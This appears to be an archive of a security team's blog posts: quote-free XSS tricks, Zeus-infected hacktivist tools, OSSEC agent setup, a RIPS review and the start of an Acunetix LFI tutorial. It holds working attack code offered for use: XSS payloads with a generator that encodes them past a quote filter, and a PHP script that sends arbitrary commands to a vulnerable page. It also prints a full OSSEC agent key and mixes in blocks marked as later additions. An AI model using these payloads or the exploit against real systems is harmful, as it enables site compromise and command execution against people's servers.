<span style="font-family: arial;">Note that String is used to define the string we want. The text has to sit between / / precisely to avoid quotes: /DcLabs/ is a regular-expression literal, and String() turns it into the text /DcLabs/ with the slashes included. Right after that, substr extracts DcLabs, dropping the two slashes. </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">It would work without substr, but the slashes would show up in the alert, or wherever you injected the code, and that could cause problems.</span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">If you want a longer string you have to adjust the substr arguments: the first stays 1 (skipping the opening slash) and the second is the length of the text itself, so the closing slash is left out. </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">This one uses the sessionStorage object (which keeps data for the lifetime of a browser window or tab) to host the expression: sessionStorage[!-1] is sessionStorage[false], a property that can be assigned to without writing a quote. The alert(123) on the right-hand side runs while the assignment is evaluated; the trailing (!-1) then calls its undefined return value, which throws a TypeError, but only after the alert has already fired.</span><br />
<span style="font-family: arial;"><b>(sessionStorage[!-1]=alert(123))(!-1)</b></span><br />
<span style="font-family: arial;"><br />In this case, with the idea of not using quotes:</span><br />
<span style="font-family: arial;"><br /><b>(sessionStorage[!-1]=alert( String(/DcLabs/).substr(1,6) ) )(!-1)</b></span><br />
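Generalising the trick above, here is an added example (my code, not from the original post or the garage4hackers thread): a small Node.js script that turns any text into a JavaScript expression containing no quote character. Runs of characters a regex literal can carry become /text/.source (the .source property of a RegExp is its pattern text without the slashes, so nothing has to be trimmed with substr), and characters the regex route cannot express, such as the '/' and '<' of a URL or a tag, become String.fromCodePoint(...). The filter it models (blocking quotes, < and >) is an assumption taken from the post's description, and the sample strings are constructed for the demo. It also shows the two length-independent alternatives to substr(1,6): slice(1,-1) and .source.

```javascript
// Added example, not code from the original post: generator for quote-free
// JavaScript string expressions, generalising String(/DcLabs/).substr(1,6).
// Run with Node.js.

// Conservative set of characters that can sit literally inside a regex literal
// body without breaking its syntax. Deliberately left out: '/' (closes the
// literal), '\' (escape), '*' (a leading "/*" opens a comment), '+', '?', '(',
// ')', '[', ']', '{', '}', newlines, and the quote/angle characters the
// (assumed) input filter rejects.
const SAFE_CHAR = /^[A-Za-z0-9 _\-:.,;!@#%&=]$/;

// Split text into maximal runs of safe and unsafe characters.
function splitRuns(text) {
  const runs = [];
  for (const ch of text) {            // iterates by code point
    const safe = SAFE_CHAR.test(ch);
    const last = runs[runs.length - 1];
    if (last && last.safe === safe) last.text += ch;
    else runs.push({ safe, text: ch });
  }
  return runs;
}

// Build an expression with no quote character that evaluates to `text`.
// Safe runs become regex literals read through .source; unsafe runs become
// String.fromCodePoint(...) with decimal code points (digits and commas only).
function quoteFree(text) {
  if (text.length === 0) return '[]+[]';   // [] + [] === ""
  return splitRuns(text).map(run => run.safe
      ? `/${run.text}/.source`
      : `String.fromCodePoint(${[...run.text].map(c => c.codePointAt(0)).join(',')})`
  ).join('+');
}

// The three ways to strip the slashes from String(/DcLabs/): substr needs the
// text length, as the post notes; slice(1,-1) and .source do not.
function viaSubstr(text) { return `String(/${text}/).substr(1,${text.length})`; }
function viaSlice(text)  { return `String(/${text}/).slice(1,-1)`; }
function viaSource(text) { return `/${text}/.source`; }

// Evaluate an expression the way the browser would inside a script context;
// used here only to verify the round trip.
function evalExpr(expr) {
  return new Function('return (' + expr + ');')();
}

// True if the payload still contains a character the modelled filter rejects.
function containsForbidden(expr) {
  return /["'<>]/.test(expr);
}

// Demo on a constructed string that needs both encodings.
const sample = 'DcLabs <img src=x onerror=alert(1)>';
const payload = quoteFree(sample);
console.log(payload);
console.log('round trip:', evalExpr(payload) === sample,
            'filter-clean:', !containsForbidden(payload));
```

Any of the generated expressions can replace the string argument in the payloads above; the alert(String(/DcLabs/).substr(1,6)) form is just quoteFree('DcLabs') with substr instead of .source.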
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">OK! We have an XSS without quotes! (: </span>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-40605909860027235582012-03-05T09:54:00.002-08:002012-03-05T09:54:54.017-08:00[DcLabs] Slowloris and other Anonymous tools infected with malware
The research published by <a href="http://www.symantec.com/connect/fr/blogs/anonymous-supporters-tricked-installing-zeus-trojan">Symantec</a> shows that one of the tools used by Anonymous was modified to carry the <a href="http://blog.alexos.com.br/?p=1359">Zeus</a> malware. The figures below compare the characteristics of the files published in May 2011 and in January 2012 during Operation Megaupload, with around 26,000 views and 400 tweets.<br />
<br />
<img alt="img" src="http://www.symantec.com/connect/imagebrowser/view/image/2149291/_original" />
In Brazil, new members have access to several beginner packs containing all the tools needed for the DDoS attacks, along with usage instructions.<br />
<br />
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/03/tools.png"><img alt="" class="alignnone size-medium wp-image-2992" height="173" src="http://blog.alexos.com.br/wp-content/uploads/2012/03/tools-300x173.png" title="tools" width="300" /></a><br />
Analysing the contents of the pack, I found that 28 of the 42 files are malware.<br />
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal11.png"><img alt="" class="alignnone size-medium wp-image-2997" height="247" src="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal11-300x247.png" title="virustotal1" width="300" /></a><br />
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal2.png"><img alt="" class="alignnone size-medium wp-image-2995" height="250" src="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal2-300x250.png" title="virustotal2" width="300" /></a><br />
Since a large share of the participants are newbies, their machines end up serving not only as "volunteer" zombies for hacktivist purposes but may also be used for cybercrime operations.
Read more:
<a href="http://www.symantec.com/connect/fr/blogs/anonymous-supporters-tricked-installing-zeus-trojan">Anonymous Supporters Tricked into Installing Zeus Trojan</a>
<a href="http://www.imperva.com/download.asp?id=312">The Anatomy of an Anonymous Attack</a><br />
<br />
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">--</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">Alexandro Silva (Alexos)</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">DcLabs Security Team</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-21230620380627840012012-03-02T04:22:00.000-08:002012-03-02T04:23:00.024-08:00Configurando chaves de autenticação dos agentes no OssecO <a href="http://blog.alexos.com.br/?p=886">modo tradicional</a> para configurar as chaves de autenticação dos <a href="http://blog.alexos.com.br/?p=886">agentes</a> no Ossec server é sustentável até 5 servidores em média. Para facilitar esta tarefa <a href="http://dcid.me/">Daniel Cid</a> criou o daemon <a href="http://www.ossec.net/doc/programs/ossec-authd.html">ossec-authd</a>, responsável por gerenciar as chaves de autenticação dos agentes no servidor usando um certificado digital.
<strong>ON THE OSSEC SERVER</strong>
Run the following commands to generate the certificate:
<br />
<blockquote>
#openssl genrsa -out /var/ossec/etc/sslmanager.key 2048
Generating RSA private key, 2048 bit long modulus
.........................................................................+++
...................................................................................................................................+++
e is 65537 (0x10001)
</blockquote>
<blockquote>
#openssl req -new -x509 -key /var/ossec/etc/sslmanager.key -out /var/ossec/etc/sslmanager.cert -days 365
-----
Country Name (2 letter code) [AU]:<strong>BR</strong>
State or Province Name (full name) [Some-State]:<strong>Bahia</strong>
Locality Name (eg, city) []:<strong>Salvador</strong>
Organization Name (eg, company) [Internet Widgits Pty Ltd]:<strong>Alexos Core Labs</strong>
Organizational Unit Name (eg, section) []:<strong>IT</strong>
Common Name (eg, YOUR name) []:<strong>debian</strong>
Email Address []:<strong>alexos@acme.com</strong>
</blockquote>
Start ossec-authd. Note that ossec-authd performs no authentication or authorization of its own: any host that can reach port 1515 can request and obtain an agent key. Restrict the port with a firewall and run the daemon only while new agents are being enrolled.
<br />
<blockquote>
#/var/ossec/bin/ossec-authd -p 1515 >/dev/null 2>&1 &
</blockquote>
<blockquote>
#netstat -at | grep 1515
tcp 0 0 *:1515 *:* LISTEN
</blockquote>
<strong>NO OSSEC AGENT</strong>
NOTE: Before compiling the agent, install the <strong><em>libssl-dev</em></strong> package (Debian) or <strong><em>openssl-devel</em></strong> (CentOS) to avoid the error message below.
<br />
<blockquote>
<strong>ERROR: Not compiled. Missing OpenSSL support.</strong>
</blockquote>
Run the following command to start the authentication:
<br />
<blockquote>
#/var/ossec/bin/agent-auth -m 192.168.0.1 -p 1515
2012/03/01 20:28:12 ossec-authd: INFO: Started (pid: 10988).
INFO: Connected to 192.168.0.1:1515
INFO: Using agent name as: debian
INFO: Send request to manager. Waiting for reply.
INFO: Received response with agent key
INFO: Valid key created. Finished.
INFO: Connection closed.
</blockquote>
Restart the server and the agent:
<br />
<blockquote>
invoke-rc.d ossec restart ( Debian )
</blockquote>
or
<br />
<blockquote>
service ossec restart ( CentOS )
</blockquote>
Confirm communication using <strong>agent_control</strong> on the server
<br />
<blockquote>
#/var/ossec/bin/agent_control -l
OSSEC HIDS agent_control. List of available agents:
ID: 000, Name: debian (server), IP: 127.0.0.1, Active/Local
<strong>ID: 1024, Name: debian, IP: any, Active</strong>
</blockquote>
<a href="http://dcid.me/2011/01/automatically-creating-and-setting-up-the-agent-keys/">Reference</a><br />
<br />
--<br />
Alexandro Silva (Alexos)<br />
DcLabs Security TeamUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-19390288389342301102012-02-28T09:41:00.002-08:002012-02-28T09:43:51.322-08:00Configuring the OSSEC HIDS agent on Windows ServerInstalling OSSEC on Windows is quite intuitive, but a few adjustments are needed to make it fully effective.
After completing the installation, the host must be registered on the OSSEC server so that the two can communicate.
On the <strong>server</strong>, perform the following steps
<br />
Run manage_agents
<br />
<br />
/var/ossec/bin/manage_agents
<br />
****************************************<br />
* OSSEC HIDS v2.6 Agent manager. *<br />
* The following options are available: *<br />
****************************************<br />
(A)dd an agent (A).<br />
(E)xtract key for an agent (E).<br />
(L)ist already added agents (L).<br />
(R)emove an agent (R).<br />
(Q)uit.<br />
Choose your action: A,E,L,R or Q: A <strong>[ Type A to add an agent ]
</strong>
- Adding a new agent (use '\q' to return to the main menu).<br />
Please provide the following:<br />
* A name for the new agent: teste <strong>[ Enter the agent name ]</strong><br />
* The IP Address of the new agent: xxx.xxx.xxx.xxx <strong>[ Enter the agent IP ]</strong>
<br />
* An ID for the new agent[001]: <strong>[ Press ENTER or provide an ID ]</strong>
Agent information:
ID:001
Name:W2k3
IP Address:192.168.0.2
<br />
Confirm adding it?(y/n): y <strong>[ Type 'y' ]
</strong>
Agent added.<br />
<br />
****************************************<br />
* OSSEC HIDS v2.6 Agent manager. *<br />
* The following options are available: *<br />
****************************************<br />
<br />
(A)dd an agent (A).<br />
(E)xtract key for an agent (E).<br />
(L)ist already added agents (L).<br />
(R)emove an agent (R).<br />
(Q)uit.<br />
Choose your action: A,E,L,R or Q: E <strong>[ Type 'E' to get the agent key ]</strong><br />
<strong></strong>Available agents:
ID: 001, Name: teste, IP: 192.168.0.2<br />
Provide the ID of the agent to extract the key (or '\q' to quit): 001 <strong>[ Enter the agent ID ]</strong><br />
<br />
<strong></strong>Agent key information for '001' is: [ Keep this key; it goes into the agent configuration ]
MDAxIHRlc3RlIDE3Mi4xNi4wLjYgZmRkMDRiM2EyNThlYWM0ZWQ5ODU1NWZmNGY0NjM3YTVjMDI2MzA5NTg1Y2M5NjgyODczNjIxMTdiMzhlZWFlYw==<br />
<br />
Restart the OSSEC server
<br />
/var/ossec/bin/ossec-control restart<br />
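One thing worth knowing before pasting the key into the agent: the string manage_agents prints is nothing more than base64 of the matching client.keys line, "id name ip secret", so it is the shared secret itself and should be handled as one (not mailed around in the clear). Decoding the key printed above gives id 001, name teste, IP 172.16.0.6 and a 64-character hex secret. The Node.js snippet below is an added example (my code, not from the original post or from OSSEC): it decodes a key, checks its four fields and compares them with what was typed into manage_agents, so a key copied from the wrong agent is caught before the agent is restarted. The assumptions are the OSSEC 2.x key format, which the key above fits, and that the secret is always 64 hex characters.

```javascript
// Added example, not from the original post: decode and sanity-check an OSSEC
// agent key as printed by manage_agents. Assumes the OSSEC 2.x format
// "<id> <name> <ip> <64-hex secret>" (base64-encoded). Run with Node.js.

// The key shown in the post above, used here as sample input.
const KEY_FROM_POST =
  'MDAxIHRlc3RlIDE3Mi4xNi4wLjYgZmRkMDRiM2EyNThlYWM0ZWQ5ODU1NWZmNGY0NjM3YTVjMDI2MzA5NTg1Y2M5NjgyODczNjIxMTdiMzhlZWFlYw==';

// Parse a key into its four fields; throws on anything that does not look
// like "<id> <name> <ip> <secret>".
function parseAgentKey(b64) {
  const line = Buffer.from(b64, 'base64').toString('utf8').trim();
  const parts = line.split(' ');
  if (parts.length !== 4) throw new Error('unexpected key format: ' + line);
  const [id, name, ip, secret] = parts;
  if (!/^\d{3,}$/.test(id)) throw new Error('bad agent id: ' + id);
  if (ip !== 'any' && !/^\d{1,3}(\.\d{1,3}){3}$/.test(ip)) throw new Error('bad ip: ' + ip);
  // assumption: OSSEC 2.x secrets are 64 lowercase hex characters
  if (!/^[0-9a-f]{64}$/.test(secret)) throw new Error('secret is not 64 hex chars');
  return { id, name, ip, secret };
}

// Compare the key's id/name/ip with the values entered in manage_agents.
function keyMatches(b64, expected) {
  const k = parseAgentKey(b64);
  return k.id === expected.id && k.name === expected.name && k.ip === expected.ip;
}

// Re-encode a client.keys line, e.g. to rebuild a key from the server file.
function encodeAgentKey({ id, name, ip, secret }) {
  return Buffer.from(`${id} ${name} ${ip} ${secret}`, 'utf8').toString('base64');
}

// Demo: show only the first bytes of the secret, as the rest is sensitive.
const k = parseAgentKey(KEY_FROM_POST);
console.log(`id=${k.id} name=${k.name} ip=${k.ip} secret=${k.secret.slice(0, 8)}...`);
```

If keyMatches() returns false the key belongs to a different agent entry (wrong ID, name or IP) and the agent will never be accepted by the server; extract the right one with manage_agents before restarting.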
On the agent, add the OSSEC server's IP and the key generated above.
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/02/ossecagent.png"><img alt="" class="alignnone size-medium wp-image-2900" height="263" src="http://blog.alexos.com.br/wp-content/uploads/2012/02/ossecagent-300x263.png" title="ossecagent" width="300" /></a><br />
By default the Windows agent reads the logs of the default virtual hosts (W3SVC1 through W3SVC254 for web, MSFTPSVC1 through MSFTPSVC254 for FTP and SMTPSVC1 through SMTPSVC254 for SMTP). This default does not fit most deployments, so both IIS and OSSEC need adjusting.
<strong>IN IIS</strong>
Perform the following steps on every existing VHOST, for both web and FTP
1 - Tick options 1 and 2 as shown in the screen below:
<br /><br />
<img alt="img1" src="http://www.ossec.net/doc/_images/w3c-opt3.jpg" /><br />
Note the log file path (LOG FILE NAME), which in the image above is <strong>W3SVC767321757\exyymmdd.log</strong>. We will add this information to the agent configuration file.
2 - Click the ADVANCED tab and tick every option there.<br />
<br />
<img alt="img2" src="http://www.ossec.net/doc/_images/w3c-opt2.jpg" /><br />
<br />
<strong>IN THE OSSEC AGENT</strong>
1 - Start the Agent Manager and click VIEW -> VIEW CONFIG
Add the following XML tag at the end of the file, giving the directories IIS showed earlier. Repeat the whole tag for each directory.
<style type="text/css">
ol{margin:0;padding:0}p{margin:0}.c2{vertical-align:top;width:468pt;border-style:solid;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt}.c3{max-width:468pt;background-color:#ffffff;padding:72pt 72pt 72pt 72pt}.c1{height:11pt;direction:ltr}.c0{line-height:1.0;direction:ltr}.c4{border-collapse:collapse}.title{padding-top:24pt;line-height:1.15;text-align:left;color:#000000;font-size:36pt;font-family:Arial;font-weight:bold;padding-bottom:6pt}.subtitle{padding-top:18pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:24pt;font-family:Georgia;padding-bottom:4pt}body{color:#000000;font-size:11pt;font-family:Arial}h1{padding-top:24pt;line-height:1.15;text-align:left;color:#000000;font-size:18pt;font-family:Arial;font-weight:bold;padding-bottom:6pt}h2{padding-top:18pt;line-height:1.15;text-align:left;color:#000000;font-size:14pt;font-family:Arial;font-weight:bold;padding-bottom:4pt}h3{padding-top:14pt;line-height:1.15;text-align:left;color:#666666;font-size:12pt;font-family:Arial;font-weight:bold;padding-bottom:4pt}h4{padding-top:12pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:11pt;font-family:Arial;padding-bottom:2pt}h5{padding-top:11pt;line-height:1.15;text-align:left;color:#666666;font-size:10pt;font-family:Arial;font-weight:bold;padding-bottom:2pt}h6{padding-top:10pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:10pt;font-family:Arial;padding-bottom:2pt}
</style><br />
<div class="c1">
</div>
<table cellpadding="0" cellspacing="0" class="c4"><tbody>
<tr><td class="c2"><div class="c0">
<!-- IIS log file --></div>
<div class="c0">
<ossec_config></div>
<div class="c0">
<localfile></div>
<div class="c0">
<location>C:\WINDOWS\System32\LogFiles\W3SVC767321757\ex%y%m%d.log</location></div>
<div class="c0">
<log_format>iis</log_format></div>
<div class="c0">
</localfile></div>
<div class="c0">
</ossec_config></div>
</td></tr>
</tbody></table>
<div class="c1">
</div>
After performing the steps above, restart the agent and follow its log and the alerts.<br />
<br />
--
Alexandro Silva (Alexos)Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-44921662674890255302012-01-08T03:39:00.000-08:002012-01-08T07:17:18.070-08:00RIPS 0.51: Basic analysis<br />
I ran a few tests on the tool and it behaved well, including on a larger system. <br />
I analysed applications of between 1 and 1200 files; above 100 files I found
performance somewhat degraded. On a Core i5 / 6 GB machine,
RIPS makes httpd consume about 25% CPU. <br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: -webkit-auto;">There are several scan levels, you can choose server-side or client-side scanning, and it is also possible to search for specific vulnerabilities</span>
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://3.bp.blogspot.com/-ftqcGrCvFV4/TwmDfJfjiQI/AAAAAAAAAT0/Vj5KYONLZF4/s1600/ScreenHunter_06+Jan.+08+09.51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ftqcGrCvFV4/TwmDfJfjiQI/AAAAAAAAAT0/Vj5KYONLZF4/s1600/ScreenHunter_06+Jan.+08+09.51.jpg" /></a></div>
<br />
<br />
What I found quite interesting is that it shows in real time which
file is being scanned, the number of files scanned/total, the line number and
an estimated time to finish. The estimate does not work very well, but it helps.<br />
<br />
<br />
<a href="http://3.bp.blogspot.com/-ZaJyBPbT9tE/Twl6B_j4glI/AAAAAAAAATs/I1ji4O72q2o/s1600/ScreenHunter_01+Jan.+08+09.00.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZaJyBPbT9tE/Twl6B_j4glI/AAAAAAAAATs/I1ji4O72q2o/s1600/ScreenHunter_01+Jan.+08+09.00.jpg" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The way a vulnerability is displayed is quite intuitive, with links and references to the functions involved, and it suggests the appropriate fixes.<br />
<div style="text-align: left;">
<br class="Apple-interchange-newline" /></div>
<br />
<a href="http://3.bp.blogspot.com/-R0zTEimFjj8/Twl6BpUX-hI/AAAAAAAAATk/K8V4Rby1pbc/s1600/ScreenHunter_02+Jan.+08+09.01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="92" src="http://3.bp.blogspot.com/-R0zTEimFjj8/Twl6BpUX-hI/AAAAAAAAATk/K8V4Rby1pbc/s320/ScreenHunter_02+Jan.+08+09.01.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<a href="http://1.bp.blogspot.com/-mKNwikwmf-s/Twl6Aqxlj2I/AAAAAAAAATU/NlMkZ2z23Dc/s1600/ScreenHunter_04+Jan.+08+09.03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="222" src="http://1.bp.blogspot.com/-mKNwikwmf-s/Twl6Aqxlj2I/AAAAAAAAATU/NlMkZ2z23Dc/s320/ScreenHunter_04+Jan.+08+09.03.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The Exploit Creator works, but it gets lost when sub-directories are involved. As you can see in the image, the url field is not filled in as it should be. This can be corrected on that same screen or in the source code after the exploit is generated.<br />
<br />
<br />
<br />
<a href="http://2.bp.blogspot.com/-JFQe8R2ZenM/Twl6BMtLLQI/AAAAAAAAATc/hUVE0EbB20Q/s1600/ScreenHunter_03+Jan.+08+09.02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="175" src="http://2.bp.blogspot.com/-JFQe8R2ZenM/Twl6BMtLLQI/AAAAAAAAATc/hUVE0EbB20Q/s320/ScreenHunter_03+Jan.+08+09.02.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
In this case a value is requested for the variable "a", which is the command to execute; the generated exploit ends up, let's say, "hard-coded", but since it is PHP the changes needed to make it usable are simple.<br />
<br />
Once the PoC is generated, just replace the value of var "a" with $argv[2] or, if you are going to use it via the web, $_GET['cmd']<br />
<br />
<br />
Here is an example (the generated script, adjusted as described above):<br />
<br />
<?php<br />
#<br />
# t.php curl exploit (generated by RIPS, then adjusted by hand)<br />
#<br />
<br />
//<br />
// HTTP GET: php -q exploit.php host[/path] command<br />
//<br />
<br />
if ($argc < 3) {<br />
    die("usage: php -q exploit.php host[/path] command\n");<br />
}<br />
<br />
$target = rtrim($argv[1], '/'); // host, optionally with the application sub-directory<br />
$cmd    = urlencode($argv[2]);  // spaces and shell metacharacters must be URL-encoded in the query string<br />
<br />
$ch = curl_init();<br />
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br />
curl_setopt($ch, CURLOPT_URL, "http://$target/t.php?a=$cmd");<br />
curl_setopt($ch, CURLOPT_HTTPGET, 1);<br />
curl_setopt($ch, CURLOPT_USERAGENT, "DcLabs");<br />
curl_setopt($ch, CURLOPT_TIMEOUT, 3);<br />
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);<br />
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);<br />
// the target may contain slashes, so sanitise it before using it as a file name<br />
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_" . preg_replace('/[^A-Za-z0-9._-]/', '_', $target));<br />
$buf = curl_exec($ch);<br />
if ($buf === false) {<br />
    die("request failed: " . curl_error($ch) . "\n");<br />
}<br />
curl_close($ch);<br />
unset($ch);<br />
<br />
echo $buf;<br />
?><br />
<br />
The command line to run it would be:<br />
<br />
php -q exploit.php localhost/teste/ <command><br />
<br />
Or, if the path was adjusted before the exploit was created:<br />
<br />
php -q exploit.php localhost <command><br />
<br />
<br />
To use the exploit, the curl extension must be enabled in php.ini <br />
<br />
extension=php_bz2.dll<br />
extension=php_curl.dll<br />
;extension=php_dba.dll<br />
extension=php_mbstring.dll<br />
extension=php_exif.dll<br />
<br />
On systems with a larger number of files to analyse, the memory_limit parameter in php.ini needs raising as well.<br />
Obviously that depends on how much memory the machine running RIPS has. <br />
<br />
<br />
Well folks, this was a really superficial analysis; if I have any news I'll post again.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-56122415597743512612012-01-03T10:20:00.000-08:002012-01-05T08:09:38.015-08:00Acunetix LFI Post Exploitation - Downloading Files Structure Part 1 (En-Us)<br />
<div class="separator" style="clear: both; text-align: left;">
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"></b></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"><span style="background-color: white; font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hi folks!</span></b></div>
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"><span style="background-color: white;"><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></b><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;"><span style="background-color: white;"><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this article we will show a very interesting feature of </span><span style="font-family: Arial; font-size: 15px; font-style: italic; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Acunetix</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: the HTTP fuzzer. In addition to being used as a fuzzer for web applications and the HTTP protocol itself, it can also be used to effectively exploit a common security flaw: Local File Inclusion, or LFI for short. If you are not familiar with this bug, a reference can be found at the end of this document.</span></span></b></div>
<b id="internal-source-marker_0.6442053494974971" style="text-align: -webkit-auto;">
<span style="background-color: white;"><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's get it started: The feature can be located on the left side of Acunetix main screen, as shown below:</span></span></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GBUelD0tw58/Tvt15gOIQtI/AAAAAAAAARw/_KScvG1cnJ8/s640/intro.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://3.bp.blogspot.com/-GBUelD0tw58/Tvt15gOIQtI/AAAAAAAAARw/_KScvG1cnJ8/s400/intro.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Understanding the fuzzer and setting the url:</span></div>
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We will not use the fuzzer as a scanner, the idea here is to use the fuzzer to extract as much information as possible from the target host.</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Fuzzer's main screen</span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> a typical HTTP request is shown:</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GET http://hostname/path HTTP/1.1</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept: */*</span><span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We will use this space to set up the request that exploits the LFI; moreover, since the field is freely editable, we can add and/or change headers. At this point you should already know the URL of the LFI, as exemplified below:</span><br />
<span style="background-color: white; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GET http://lfi.dc/lfi.php?pag= HTTP/1.1</span><br />
<span style="background-color: white; color: #333333; font-family: Arial; font-size: 15px; text-align: -webkit-auto; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/4.0 (DcLabs)</span><br />
